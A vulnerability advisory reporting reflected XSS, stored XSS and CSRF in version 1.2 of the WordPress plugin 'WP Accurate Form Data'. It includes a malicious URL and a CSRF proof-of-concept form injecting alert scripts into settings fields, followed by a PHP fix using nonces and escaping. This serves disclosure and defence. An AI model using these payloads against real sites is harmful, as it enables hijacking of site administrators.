WordPress WP Accurate Form Data plugin version 1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.
Title: WordPress 'WP Accurate Form Data' Plugin
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download:
- https://wordpress.org/plugins/accurate-form-data-real-time-form-validation/
- https://plugins.svn.wordpress.org/accurate-form-data-real-time-form-validation/
Notified WordPress: 2015-06-21
==========================================================
## Plugin description
==========================================================
The plugin performs e-mail and physical address validation automatically for most WordPress contact forms.
## XSS Vulnerabilities
==========================================================
The request URI is echoed into the HTML page without sanitization. This can be exploited with a malicious URL (keep in mind that most modern browsers encode the URL).
http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP&a="><script>alert(1)</script>
----
The options on the admin settings page are displayed/stored without sanitization. This can be exploited with a crafted POST request.
PoC (using CSRF):
Log in as admin and submit the following form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP">
<input type="text" name="wClientKey" value=""><script>alert(1)</script>"><br />
<text>wCheckEmailValidity: </text>
<input type="text" name="wCheckEmailValidity" value=""><br />
<input type="text" name="wIncludeOpen" value=""><br />
<input type="text" name="wEmailBlockAttempts" value=""><script>alert(4)</script>"><br />
<input type="text" name="wEmailFields" value=""><script>alert(5)</script>"><br />
<input type="text" name="wCheckPhysicalAddressValidity" value=""><br />
<input type="text" name="wPhysicalAddressBlockAttempts" value=""><script>alert(7)</script>"><br />
<input type="text" name="wCityFields" value=""><script>alert(8)</script>"><br />
<input type="text" name="wZipFields" value=""><script>alert(9)</script>"><br />
<input type="text" name="wAddressFields" value=""><script>alert(10)</script>"><br />
<input type="text" name="wStateFields" value=""><script>alert(11)</script>"><br />
<input type="text" name="wCountryFields" value=""><script>alert(12)</script>"><br />
<text>wSub </text>
<input type="text" name="wSub" value="Save Changes" readonly><br />
<input type="submit">
</form>
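
The three issues above (no CSRF token on the settings POST, options stored and displayed unescaped, request URI echoed into the page) map onto standard WordPress hardening calls. The following is an added example, not the plugin's code: the function names and nonce action are hypothetical, the field names and page slug come from the PoC, and it assumes every setting is a plain-text option stored under its field name.

```php
<?php
// Added example, not the plugin's code. Function names and the nonce action are
// hypothetical; field names and the page slug are taken from the PoC above.
// Assumption: each setting is a text option stored under its field name.

const AFD_NONCE_ACTION = 'afd_save_settings'; // hypothetical
const AFD_FIELDS = array(
    'wClientKey', 'wCheckEmailValidity', 'wIncludeOpen', 'wEmailBlockAttempts',
    'wEmailFields', 'wCheckPhysicalAddressValidity', 'wPhysicalAddressBlockAttempts',
    'wCityFields', 'wZipFields', 'wAddressFields', 'wStateFields', 'wCountryFields',
);

function afd_save_settings() {
    if ( ! isset( $_POST['wSub'] ) ) {
        return; // not a save request
    }
    // CSRF: a POST without a valid nonce for this action is rejected (dies).
    check_admin_referer( AFD_NONCE_ACTION );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    foreach ( AFD_FIELDS as $field ) {
        $raw = isset( $_POST[ $field ] ) ? wp_unslash( $_POST[ $field ] ) : '';
        // Stored XSS: strip tags before the value reaches the database.
        update_option( $field, sanitize_text_field( $raw ) );
    }
}

function afd_render_settings_page() {
    afd_save_settings();
    // Reflected XSS: build the action from a fixed URL, never from REQUEST_URI.
    $action = admin_url( 'options-general.php?page=Accu_Data_WP' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    wp_nonce_field( AFD_NONCE_ACTION ); // emits the hidden _wpnonce field
    foreach ( AFD_FIELDS as $field ) {
        // Escape on output as well, so values already stored stay inert.
        printf(
            '<label>%1$s <input type="text" name="%1$s" value="%2$s"></label><br />',
            esc_attr( $field ),
            esc_attr( get_option( $field, '' ) )
        );
    }
    echo '<input type="submit" name="wSub" value="Save Changes"></form>';
}
```

With the nonce check in place, the cross-site form shown in the PoC is rejected before any option is written, and `esc_attr()` on output keeps a `">` sequence inside the attribute value.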
## Solution
==========================================================
No fix available
==========================================================
XSS vulnerabilities found using Eir, an early-stage static vulnerability scanner for PHP applications.